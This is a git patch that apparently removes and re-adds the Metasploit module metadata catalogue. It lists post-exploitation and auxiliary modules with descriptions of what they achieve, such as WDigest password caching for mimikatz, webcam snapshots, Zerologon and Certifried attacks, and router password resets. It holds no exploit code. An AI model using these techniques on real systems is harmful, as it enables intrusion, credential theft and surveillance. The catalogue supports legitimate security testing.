a VSS copy" - } - ] - }, - "post_windows/manage/wdigest_caching": { - "name": "Windows Post Manage WDigest Credential Caching", - "fullname": "post/windows/manage/wdigest_caching", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Kostas Lintovois " - ], - "description": "On Windows 8/2012 or higher, the Digest Security Provider (WDIGEST) is disabled by default. 
This module enables/disables\n credential caching by adding/changing the value of the UseLogonCredential DWORD under the WDIGEST provider's Registry key.\n Any subsequent logins will allow mimikatz to recover the plain text passwords from the system's memory.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-09 10:51:17 +0000", - "path": "/modules/post/windows/manage/wdigest_caching.rb", - "is_install_path": true, - "ref_name": "windows/manage/wdigest_caching", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "config-changes" - ], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/manage/webcam": { - "name": "Windows Manage Webcam", - "fullname": "post/windows/manage/webcam", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "sinn3r " - ], - "description": "This module will allow the user to detect installed webcams (with\n the LIST action) or take a snapshot (with the SNAPSHOT) action.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-09 10:51:17 +0000", - "path": "/modules/post/windows/manage/webcam.rb", - "is_install_path": true, - "ref_name": "windows/manage/webcam", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "physical-effects" - ], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [ - { - "name": "LIST", - "description": "Show a list of webcams" - }, - { - "name": "SNAPSHOT", - "description": "Take a snapshot with the webcam" - } - ] - }, - 
"post_windows/recon/computer_browser_discovery": { - "name": "Windows Recon Computer Browser Discovery", - "fullname": "post/windows/recon/computer_browser_discovery", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "mubix " - ], - "description": "This module uses railgun to discover hostnames and IPs on the network.\n LTYPE should be set to one of the following values: WK (all workstations), SVR (all servers),\n SQL (all SQL servers), DC (all Domain Controllers), DCBKUP (all Domain Backup Servers),\n NOVELL (all Novell servers), PRINTSVR (all Print Que servers), MASTERBROWSER (all Master Browsers),\n WINDOWS (all Windows hosts), or UNIX (all Unix hosts).", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-09 10:51:17 +0000", - "path": "/modules/post/windows/recon/computer_browser_discovery.rb", - "is_install_path": true, - "ref_name": "windows/recon/computer_browser_discovery", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/recon/outbound_ports": { - "name": "Windows Outbound-Filtering Rules", - "fullname": "post/windows/recon/outbound_ports", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Borja Merino " - ], - "description": "This module makes some kind of TCP traceroute to get outbound-filtering rules.\n It will try to make a TCP connection to a certain public IP address (this IP\n does not need to be under your control) using different TTL incremental values.\n This way if you get an answer (ICMP TTL time exceeded packet) from a public IP\n device you can infer that the destination port is allowed. 
Setting STOP to\n true the module will stop as soon as you reach a public IP (this will generate\n less noise in the network).", - "references": [ - "URL-http://www.shelliscoming.com/2014/11/getting-outbound-filtering-rules-by.html" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-09 10:51:17 +0000", - "path": "/modules/post/windows/recon/outbound_ports.rb", - "is_install_path": true, - "ref_name": "windows/recon/outbound_ports", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/wlan/wlan_bss_list": { - "name": "Windows Gather Wireless BSS Info", - "fullname": "post/windows/wlan/wlan_bss_list", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "theLightCosine " - ], - "description": "This module gathers information about the wireless Basic Service Sets\n available to the victim machine.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-09 10:51:17 +0000", - "path": "/modules/post/windows/wlan/wlan_bss_list.rb", - "is_install_path": true, - "ref_name": "windows/wlan/wlan_bss_list", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/wlan/wlan_current_connection": { - "name": "Windows Gather Wireless Current Connection Info", - "fullname": "post/windows/wlan/wlan_current_connection", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": 
"post", - "author": [ - "theLightCosine " - ], - "description": "This module gathers information about the current connection on each\n wireless lan interface on the target machine.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-13 09:23:28 +0000", - "path": "/modules/post/windows/wlan/wlan_current_connection.rb", - "is_install_path": true, - "ref_name": "windows/wlan/wlan_current_connection", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/wlan/wlan_disconnect": { - "name": "Windows Disconnect Wireless Connection", - "fullname": "post/windows/wlan/wlan_disconnect", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "theLightCosine " - ], - "description": "This module disconnects the current wireless network connection\n on the specified interface.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-13 09:23:28 +0000", - "path": "/modules/post/windows/wlan/wlan_disconnect.rb", - "is_install_path": true, - "ref_name": "windows/wlan/wlan_disconnect", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-service-down" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/wlan/wlan_probe_request": { - "name": "Windows Send Probe Request Packets", - "fullname": "post/windows/wlan/wlan_probe_request", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Borja 
Merino " - ], - "description": "This module send probe requests through the wlan interface.\n The ESSID field will be use to set a custom message.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-09 10:51:17 +0000", - "path": "/modules/post/windows/wlan/wlan_probe_request.rb", - "is_install_path": true, - "ref_name": "windows/wlan/wlan_probe_request", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/wlan/wlan_profile": { - "name": "Windows Gather Wireless Profile", - "fullname": "post/windows/wlan/wlan_profile", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "theLightCosine " - ], - "description": "This module extracts saved Wireless LAN profiles. It will also try to decrypt\n the network key material. Behavior is slightly different between OS versions\n when it comes to WPA. In Windows Vista/7 we will get the passphrase. In\n Windows XP we will get the PBKDF2 derived key.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-09 10:51:17 +0000", - "path": "/modules/post/windows/wlan/wlan_profile.rb", - "is_install_path": true, - "ref_name": "windows/wlan/wlan_profile", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - } -} \ No newline at end of file From 22b80bbef3985000c3926e21ef5b06a1deb6e4c8 Mon Sep 17 00:00:00 2001 
From: whotwagner
Date: Tue, 13 May 2025 13:52:14 +0000
Subject: [PATCH 21/27] Added modules_metadata_base

---
 db/modules_metadata_base.json | 254129 +++++++++++++++++++++++++++++++
 1 file changed, 254129 insertions(+)
 create mode 100644 db/modules_metadata_base.json

diff --git a/db/modules_metadata_base.json b/db/modules_metadata_base.json
new file mode 100644
index 0000000000000..8a4984f1c3fad
--- /dev/null
+++ b/db/modules_metadata_base.json
@@ -0,0 +1,254129 @@ +{ + "auxiliary_admin/2wire/xslt_password_reset": { + "name": "2Wire Cross-Site Request Forgery Password Reset Vulnerability", + "fullname": "auxiliary/admin/2wire/xslt_password_reset", + "aliases": [], + "rank": 300, + "disclosure_date": "2007-08-15", + "type": "auxiliary", + "author": [ + "hkm ", + "Travis Phillips" + ], + "description": "This module will reset the admin password on a 2Wire wireless router. This is\n done by using the /xslt page where authentication is not required, thus allowing\n configuration changes (such as resetting the password) as administrators.", + "references": [ + "CVE-2007-4387", + "OSVDB-37667", + "BID-36075", + "URL-https://seclists.org/bugtraq/2007/Aug/225" + ], + "platform": "", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/auxiliary/admin/2wire/xslt_password_reset.rb", + "is_install_path": true, + "ref_name": "admin/2wire/xslt_password_reset", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/android/google_play_store_uxss_xframe_rce": { + "name": "Android Browser RCE Through Google Play Store XFO", + "fullname": "auxiliary/admin/android/google_play_store_uxss_xframe_rce", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "Rafay Baloch", + "joev " + ], + "description": "This module combines two vulnerabilities to achieve remote code\n execution on affected Android devices. First, the module exploits\n CVE-2014-6041, a Universal Cross-Site Scripting (UXSS) vulnerability present in\n versions of Android's open source stock browser (the AOSP Browser) prior to\n 4.4. 
Second, the Google Play store's web interface fails to enforce a\n X-Frame-Options: DENY header (XFO) on some error pages, and therefore, can be\n targeted for script injection. As a result, this leads to remote code execution\n through Google Play's remote installation feature, as any application available\n on the Google Play store can be installed and launched on the user's device.\n\n This module requires that the user is logged into Google with a vulnerable browser.\n\n To list the activities in an APK, you can use `aapt dump badging /path/to/app.apk`.", + "references": [ + "URL-http://web.archive.org/web/20230321034739/https://www.rapid7.com/blog/post/2014/09/15/major-android-bug-is-a-privacy-disaster-cve-2014-6041/", + "URL-https://web.archive.org/web/20150316151817/http://1337day.com/exploit/description/22581", + "OSVDB-110664", + "CVE-2014-6041" + ], + "platform": "", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2025-02-28 09:35:28 +0000", + "path": "/modules/auxiliary/admin/android/google_play_store_uxss_xframe_rce.rb", + "is_install_path": true, + "ref_name": "admin/android/google_play_store_uxss_xframe_rce", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [ + { + "name": "WebServer", + "description": "Serve exploit via web server" + } + ] + }, + "auxiliary_admin/appletv/appletv_display_image": { + "name": "Apple TV Image Remote Control", + "fullname": "auxiliary/admin/appletv/appletv_display_image", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "0a29406d9794e4f9b30b3c5d6702c708", + "sinn3r " + ], + "description": "This module will show an image on an AppleTV device for a period of time.\n Some AppleTV devices are actually password-protected, in that case please\n set the PASSWORD datastore option. 
For password brute forcing, please see\n the module auxiliary/scanner/http/appletv_login.", + "references": [ + "URL-http://nto.github.io/AirPlay.html" + ], + "platform": "", + "arch": "", + "rport": 7000, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2017-07-24 06:26:21 +0000", + "path": "/modules/auxiliary/admin/appletv/appletv_display_image.rb", + "is_install_path": true, + "ref_name": "admin/appletv/appletv_display_image", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/appletv/appletv_display_video": { + "name": "Apple TV Video Remote Control", + "fullname": "auxiliary/admin/appletv/appletv_display_video", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "0a29406d9794e4f9b30b3c5d6702c708", + "sinn3r " + ], + "description": "This module plays a video on an AppleTV device. Note that\n AppleTV can be somewhat picky about the server that hosts the video.\n Tested servers include default IIS, default Apache, and Ruby's WEBrick.\n For WEBrick, the default MIME list may need to be updated, depending on\n what media file is to be played. Python SimpleHTTPServer is not\n recommended. Also, if you're playing a video, the URL must be an IP\n address. Some AppleTV devices are actually password-protected; in that\n case please set the PASSWORD datastore option. 
For password\n brute forcing, please see the module auxiliary/scanner/http/appletv_login.", + "references": [ + "URL-http://nto.github.io/AirPlay.html" + ], + "platform": "", + "arch": "", + "rport": 7000, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2017-07-24 06:26:21 +0000", + "path": "/modules/auxiliary/admin/appletv/appletv_display_video.rb", + "is_install_path": true, + "ref_name": "admin/appletv/appletv_display_video", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/atg/atg_client": { + "name": "Veeder-Root Automatic Tank Gauge (ATG) Administrative Client", + "fullname": "auxiliary/admin/atg/atg_client", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "Jon Hart " + ], + "description": "This module acts as a simplistic administrative client for interfacing\n with Veeder-Root Automatic Tank Gauges (ATGs) or other devices speaking\n the TLS-250 and TLS-350 protocols. 
This has been tested against\n GasPot and Conpot, both honeypots meant to simulate ATGs; it has not\n been tested against anything else, so use at your own risk.", + "references": [ + "URL-https://www.rapid7.com/blog/post/2015/01/22/the-internet-of-gas-station-tank-gauges/", + "URL-https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/the-gaspot-experiment", + "URL-https://github.com/sjhilt/GasPot", + "URL-https://github.com/mushorg/conpot", + "URL-https://www.veeder.com/us/automatic-tank-gauge-atg-consoles", + "URL-https://cdn.chipkin.com/files/liz/576013-635.pdf", + "URL-https://docs.veeder.com/gold/download.cfm?doc_id=6227" + ], + "platform": "", + "arch": "", + "rport": 10001, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2022-01-23 15:28:32 +0000", + "path": "/modules/auxiliary/admin/atg/atg_client.rb", + "is_install_path": true, + "ref_name": "admin/atg/atg_client", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [ + { + "name": "ALARM", + "description": "I30200 Sensor alarm history (untested)" + }, + { + "name": "ALARM_RESET", + "description": "IS00300 Remote alarm reset (untested)" + }, + { + "name": "CLEAR_RESET", + "description": "IS00200 Clear Reset Flag (untested)" + }, + { + "name": "DELIVERY", + "description": "I20200 Delivery report" + }, + { + "name": "INVENTORY", + "description": "200/I20100 In-tank inventory report" + }, + { + "name": "LEAK", + "description": "I20300 Leak report" + }, + { + "name": "RELAY", + "description": "I40600 Relay status (untested)" + }, + { + "name": "RESET", + "description": "IS00100 Reset (untested)" + }, + { + "name": "SENSOR", + "description": "I30100 Sensor status (untested)" + }, + { + "name": "SENSOR_DIAG", + "description": "IB0100 Sensor diagnostics (untested)" + }, + { + "name": "SET_TANK_NAME", + "description": "S602 set tank name (use 
TANK_NUMBER and TANK_NAME options)" + }, + { + "name": "SHIFT", + "description": "I20400 Shift report" + }, + { + "name": "STATUS", + "description": "I20500 In-tank status report" + }, + { + "name": "SYSTEM_STATUS", + "description": "I10100 System status report (untested)" + }, + { + "name": "TANK_ALARM", + "description": "I20600 Tank alarm history (untested)" + }, + { + "name": "TANK_DIAG", + "description": "IA0100 Tank diagnostics (untested)" + }, + { + "name": "VERSION", + "description": "Version information" + } + ] + }, + "auxiliary_admin/aws/aws_launch_instances": { + "name": "Launches Hosts in AWS", + "fullname": "auxiliary/admin/aws/aws_launch_instances", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "Javier Godinez " + ], + "description": "This module will attempt to launch an AWS instances (hosts) in EC2.", + "references": [ + "URL-https://drive.google.com/open?id=0B2Ka7F_6TetSNFdfbkI1cnJHUTQ", + "URL-https://published-prd.lanyonevents.com/published/rsaus17/sessionsFiles/4721/IDY-W10-DevSecOps-on-the-Offense-Automating-Amazon-Web-Services-Account-Takeover.pdf" + ], + "platform": "", + "arch": "", + "rport": 443, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2024-01-07 15:02:53 +0000", + "path": "/modules/auxiliary/admin/aws/aws_launch_instances.rb", + "is_install_path": true, + "ref_name": "admin/aws/aws_launch_instances", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/backupexec/dump": { + "name": "Veritas Backup Exec Windows Remote File Access", + "fullname": "auxiliary/admin/backupexec/dump", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "hdm ", + "Unknown" + ], + "description": "This module abuses a logic flaw in the Backup Exec Windows Agent to download\n arbitrary files from 
the system. This flaw was found by someone who wishes to\n remain anonymous and affects all known versions of the Backup Exec Windows Agent. The\n output file is in 'MTF' format, which can be extracted by the 'NTKBUp' program\n listed in the references section. To transfer an entire directory, specify a\n path that includes a trailing backslash.", + "references": [ + "CVE-2005-2611", + "OSVDB-18695", + "BID-14551", + "URL-https://web.archive.org/web/20120227144337/http://www.fpns.net/willy/msbksrc.lzh" + ], + "platform": "", + "arch": "", + "rport": 10000, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2024-01-07 15:02:53 +0000", + "path": "/modules/auxiliary/admin/backupexec/dump.rb", + "is_install_path": true, + "ref_name": "admin/backupexec/dump", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [ + { + "name": "Download", + "description": "Download arbitrary file" + } + ] + }, + "auxiliary_admin/backupexec/registry": { + "name": "Veritas Backup Exec Server Registry Access", + "fullname": "auxiliary/admin/backupexec/registry", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "hdm " + ], + "description": "This modules exploits a remote registry access flaw in the BackupExec Windows\n Server RPC service. 
This vulnerability was discovered by Pedram Amini and is based\n on the NDR stub information posted to openrce.org.\n Please see the action list for the different attack modes.", + "references": [ + "OSVDB-17627", + "CVE-2005-0771", + "URL-https://web.archive.org/web/20110801042138/http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=269" + ], + "platform": "", + "arch": "", + "rport": 6106, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2022-01-23 15:28:32 +0000", + "path": "/modules/auxiliary/admin/backupexec/registry.rb", + "is_install_path": true, + "ref_name": "admin/backupexec/registry", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [ + { + "name": "Create Logon Notice", + "description": "Add a logon notice" + }, + { + "name": "System Information", + "description": "Dump system info (user, owner, OS, CPU...)" + } + ] + }, + "auxiliary_admin/chromecast/chromecast_reset": { + "name": "Chromecast Factory Reset DoS", + "fullname": "auxiliary/admin/chromecast/chromecast_reset", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "wvu " + ], + "description": "This module performs a factory reset on a Chromecast, causing a denial of service (DoS).\n No user authentication is required.", + "references": [ + "URL-http://www.google.com/intl/en/chrome/devices/chromecast/index.html" + ], + "platform": "", + "arch": "", + "rport": 8008, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2017-07-24 06:26:21 +0000", + "path": "/modules/auxiliary/admin/chromecast/chromecast_reset.rb", + "is_install_path": true, + "ref_name": "admin/chromecast/chromecast_reset", + "check": false, + "post_auth": false, + "default_credential": false, + 
"notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [ + { + "name": "Reboot", + "description": "Reboot only" + }, + { + "name": "Reset", + "description": "Factory reset" + } + ] + }, + "auxiliary_admin/chromecast/chromecast_youtube": { + "name": "Chromecast YouTube Remote Control", + "fullname": "auxiliary/admin/chromecast/chromecast_youtube", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "wvu " + ], + "description": "This module acts as a simple remote control for Chromecast YouTube.\n\n Only the deprecated DIAL protocol is supported by this module.\n Casting via the newer CASTV2 protocol is unsupported at this time.", + "references": [ + "URL-http://www.google.com/intl/en/chrome/devices/chromecast/index.html" + ], + "platform": "", + "arch": "", + "rport": 8008, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2019-05-29 12:19:52 +0000", + "path": "/modules/auxiliary/admin/chromecast/chromecast_youtube.rb", + "is_install_path": true, + "ref_name": "admin/chromecast/chromecast_youtube", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [ + { + "name": "Play", + "description": "Play video" + }, + { + "name": "Stop", + "description": "Stop video" + } + ] + }, + "auxiliary_admin/citrix/citrix_netscaler_config_decrypt": { + "name": "Decrypt Citrix NetScaler Config Secrets", + "fullname": "auxiliary/admin/citrix/citrix_netscaler_config_decrypt", + "aliases": [], + "rank": 300, + "disclosure_date": "2022-05-19", + "type": "auxiliary", + "author": [ + "npm " + ], + "description": "This module takes a Citrix NetScaler ns.conf configuration file as\n input and extracts secrets that have been stored with reversible\n encryption. 
The module supports legacy NetScaler encryption (RC4)\n as well as the newer AES-256-ECB and AES-256-CBC encryption types.\n It is also possible to decrypt secrets protected by the Key\n Encryption Key (KEK) method, provided the key fragment files F1.key\n and F2.key are provided.", + "references": [ + "URL-https://dozer.nz/posts/citrix-decrypt/", + "URL-https://www.ferroquesystems.com/resource/citrix-adc-security-kek-files/" + ], + "platform": "BSD", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2024-01-07 15:02:53 +0000", + "path": "/modules/auxiliary/admin/citrix/citrix_netscaler_config_decrypt.rb", + "is_install_path": true, + "ref_name": "admin/citrix/citrix_netscaler_config_decrypt", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [ + "repeatable-session" + ], + "SideEffects": [ + "artifacts-on-disk" + ] + }, + "session_types": false, + "needs_cleanup": false, + "actions": [ + { + "name": "Dump", + "description": "Dump secrets from NetScaler configuration" + } + ] + }, + "auxiliary_admin/db2/db2rcmd": { + "name": "IBM DB2 db2rcmd.exe Command Execution Vulnerability", + "fullname": "auxiliary/admin/db2/db2rcmd", + "aliases": [], + "rank": 300, + "disclosure_date": "2004-03-04", + "type": "auxiliary", + "author": [ + "MC " + ], + "description": "This module exploits a vulnerability in the Remote Command Server\n component in IBM's DB2 Universal Database 8.1. 
An authenticated\n attacker can send arbitrary commands to the DB2REMOTECMD named pipe\n which could lead to administrator privileges.", + "references": [ + "CVE-2004-0795", + "OSVDB-4180", + "BID-9821" + ], + "platform": "", + "arch": "", + "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], + "targets": null, + "mod_time": "2022-08-08 01:40:15 +0000", + "path": "/modules/auxiliary/admin/db2/db2rcmd.rb", + "is_install_path": true, + "ref_name": "admin/db2/db2rcmd", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/dcerpc/cve_2020_1472_zerologon": { + "name": "Netlogon Weak Cryptographic Authentication", + "fullname": "auxiliary/admin/dcerpc/cve_2020_1472_zerologon", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "Tom Tervoort", + "Spencer McIntyre", + "Dirk-jan Mollema" + ], + "description": "A vulnerability exists within the Netlogon authentication process where the security properties granted by AES\n are lost due to an implementation flaw related to the use of a static initialization vector (IV). An attacker\n can leverage this flaw to target an Active Directory Domain Controller and make repeated authentication attempts\n using NULL data fields which will succeed every 1 in 256 tries (~0.4%). This module leverages the vulnerability\n to reset the machine account password to an empty string, which will then allow the attacker to authenticate as\n the machine account. After exploitation, it's important to restore this password to it's original value. 
Failure\n to do so can result in service instability.", + "references": [ + "CVE-2020-1472", + "URL-https://www.secura.com/blog/zero-logon", + "URL-https://github.com/SecuraBV/CVE-2020-1472/blob/master/zerologon_tester.py", + "URL-https://github.com/dirkjanm/CVE-2020-1472/blob/master/restorepassword.py" + ], + "platform": "", + "arch": "", + "rport": null, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], + "targets": null, + "mod_time": "2022-08-03 14:27:30 +0000", + "path": "/modules/auxiliary/admin/dcerpc/cve_2020_1472_zerologon.rb", + "is_install_path": true, + "ref_name": "admin/dcerpc/cve_2020_1472_zerologon", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "AKA": [ + "Zerologon" + ], + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [ + "config-changes", + "ioc-in-logs" + ] + }, + "session_types": false, + "needs_cleanup": false, + "actions": [ + { + "name": "REMOVE", + "description": "Remove the machine account password" + }, + { + "name": "RESTORE", + "description": "Restore the machine account password" + } + ] + }, + "auxiliary_admin/dcerpc/cve_2022_26923_certifried": { + "name": "Active Directory Certificate Services (ADCS) privilege escalation (Certifried)", + "fullname": "auxiliary/admin/dcerpc/cve_2022_26923_certifried", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "Oliver Lyak", + "CravateRouge", + "Erik Wynter", + "Christophe De La Fuente" + ], + "description": "This module exploits a privilege escalation vulnerability in Active\n Directory Certificate Services (ADCS) to generate a valid certificate\n impersonating the Domain Controller (DC) computer account. This\n certificate is then used to authenticate to the target as the DC\n account using PKINIT preauthentication mechanism. 
The module will get\n and cache the Ticket-Granting-Ticket (TGT) for this account along\n with its NTLM hash. Finally, it requests a TGS impersonating a\n privileged user (Administrator by default). This TGS can then be used\n by other modules or external tools.", + "references": [ + "URL-https://research.ifcr.dk/certifried-active-directory-domain-privilege-escalation-cve-2022-26923-9e098fe298f4", + "URL-https://cravaterouge.github.io/ad/privesc/2022/05/11/bloodyad-and-CVE-2022-26923.html", + "CVE-2022-26923" + ], + "platform": "", + "arch": "", + "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], + "targets": null, + "mod_time": "2025-03-21 10:30:20 +0000", + "path": "/modules/auxiliary/admin/dcerpc/cve_2022_26923_certifried.rb", + "is_install_path": true, + "ref_name": "admin/dcerpc/cve_2022_26923_certifried", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": { + "AKA": [ + "Certifried" + ], + "Reliability": [], + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "ioc-in-logs" + ] + }, + "session_types": false, + "needs_cleanup": false, + "actions": [ + { + "name": "AUTHENTICATE", + "description": "Same as REQUEST_CERT but also authenticate" + }, + { + "name": "PRIVESC", + "description": "Full privilege escalation attack" + }, + { + "name": "REQUEST_CERT", + "description": "Request a certificate with DNS host name matching the DC" + } + ] + }, + "auxiliary_admin/dcerpc/icpr_cert": { + "name": "ICPR Certificate Management", + "fullname": "auxiliary/admin/dcerpc/icpr_cert", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "Will Schroeder", + "Lee Christensen", + "Oliver Lyak", + "Spencer McIntyre" + ], + "description": "Request certificates via MS-ICPR (Active Directory Certificate Services). 
